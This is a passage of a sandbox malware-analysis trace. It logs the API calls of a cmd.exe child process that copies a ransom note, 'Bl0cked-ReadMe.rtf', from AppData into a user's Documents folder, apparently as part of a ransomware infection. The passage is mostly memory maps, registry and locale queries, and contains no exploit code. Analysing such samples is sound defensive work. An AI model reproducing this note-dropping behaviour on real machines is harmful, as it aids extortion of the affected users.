SetConsoleInputExeNameW () returned 0x1 [0131.915] GetConsoleOutputCP () returned 0x1b5 [0131.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.915] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.915] exit (_Code=0) Process: id = "110" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12059 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12060 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12061 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12062 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12063 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12064 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12065 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12066 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12067 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 12068 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12147 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12148 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12149 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12150 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 12151 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 12152 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12153 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12154 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12155 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12156 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12157 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12158 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12159 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12160 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12161 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12162 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12163 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12164 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 12165 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 12166 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12167 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 12168 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 12169 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 12170 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 167 os_tid = 0xa80 [0131.754] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfacc | out: lpSystemTimeAsFileTime=0x2cfacc*(dwLowDateTime=0x8877d380, dwHighDateTime=0x1d440a9)) [0131.754] GetCurrentProcessId () returned 0x968 [0131.754] GetCurrentThreadId () returned 0xa80 [0131.754] GetTickCount () returned 0x29f98 [0131.754] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfac4 | out: lpPerformanceCount=0x2cfac4*=18854357858) returned 1 [0131.755] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.755] __set_app_type (_Type=0x1) [0131.755] __p__fmode () returned 0x76b331f4 [0131.755] __p__commode () returned 0x76b331fc [0131.755] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.755] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.755] GetCurrentThreadId () returned 0xa80 [0131.756] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa80) returned 0x38 [0131.756] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.756] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.756] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa5c | out: phkResult=0x2cfa5c*=0x0) returned 0x2 [0131.756] VirtualQuery (in: lpAddress=0x2cfa93, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.756] GetConsoleOutputCP () returned 0x1b5 [0131.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.757] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.757] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.757] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.757] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.757] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.757] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.758] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.758] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.758] GetEnvironmentStringsW () returned 0x400198* [0131.758] FreeEnvironmentStringsW (penv=0x400198) returned 1 [0131.758] GetEnvironmentStringsW () returned 0x400198* [0131.758] FreeEnvironmentStringsW (penv=0x400198) returned 1 [0131.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x40) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0xc0, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegCloseKey (hKey=0x40) returned 0x0 [0131.758] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x40) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.759] RegCloseKey (hKey=0x40) returned 0x0 [0131.759] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.759] srand (_Seed=0x5b886366) [0131.759] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0131.759] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0131.759] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.759] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.759] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.759] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.759] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.759] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.759] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.759] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.760] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.760] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.760] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.760] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.760] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.760] GetEnvironmentStringsW () returned 0x4022e8* [0131.760] FreeEnvironmentStringsW (penv=0x4022e8) returned 1 [0131.760] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.760] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.760] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.760] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.760] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.760] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.760] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.760] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.760] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.760] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf798 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf798, lpFilePart=0x2cf794 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf794*="Desktop") returned 0x18 [0131.760] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.760] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514) returned 0x400028 [0131.760] FindClose (in: hFindFile=0x400028 | out: hFindFile=0x400028) returned 1 [0131.761] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514) returned 0x400028 [0131.761] FindClose (in: hFindFile=0x400028 | out: hFindFile=0x400028) returned 1 [0131.761] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514) returned 0x400028 [0131.761] FindClose (in: hFindFile=0x400028 | out: hFindFile=0x400028) returned 1 [0131.761] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.761] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.761] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.761] GetEnvironmentStringsW () returned 0x402b08* [0131.761] FreeEnvironmentStringsW (penv=0x402b08) returned 1 [0131.761] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.762] GetConsoleOutputCP () returned 0x1b5 [0131.762] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.762] GetUserDefaultLCID () returned 0x409 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="0") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="0") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="1") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.762] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.763] GetConsoleTitleW (in: lpConsoleTitle=0x3f08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.763] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.763] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.764] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.764] _wcsicmp (_String1="type", _String2=")") returned 75 [0131.764] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0131.764] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0131.764] _wcsicmp (_String1="IF", _String2="type") returned -11 [0131.764] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0131.764] _wcsicmp (_String1="REM", _String2="type") returned -2 [0131.764] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0131.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.768] GetFileType (hFile=0x7) returned 0x2 [0131.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf7d0 | out: lpMode=0x2cf7d0) returned 1 [0131.769] _dup (_FileHandle=1) returned 3 [0131.769] _close (_FileHandle=1) returned 0 [0131.769] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0131.769] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf7a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0131.770] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0131.770] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.770] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0131.770] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0131.770] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0131.771] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0131.771] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.771] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf134, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf134) returned 0x3f0e90 [0131.771] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0131.771] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0131.772] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0131.772] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce040, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0131.772] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] GetFileType (hFile=0x54) returned 0x1 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce098 | out: 